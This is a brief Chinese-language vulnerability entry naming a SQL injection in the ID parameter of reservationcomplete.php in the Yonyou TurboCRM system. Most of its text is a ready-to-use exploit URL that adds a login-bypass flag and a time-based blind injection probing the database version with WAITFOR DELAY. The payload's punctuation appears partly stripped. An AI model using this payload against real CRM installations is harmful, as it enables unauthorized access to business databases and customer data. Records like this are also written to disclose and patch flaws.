用友TruboCRM管理系统 reservationcomplete.php 参数ID SQL注入漏洞

利用过过程： payload:http://xxx/background/reservationcomplete.php?DontCheckLogin=1&ID=1%20IFUNICODESUBSTRINGSELECT%20ISNULLCAST@@VERSION%20AS%20NVARCHAR4000,CHAR32,1,1%3d1%20WAITFOR%20DELAY%20%270:0:5%27...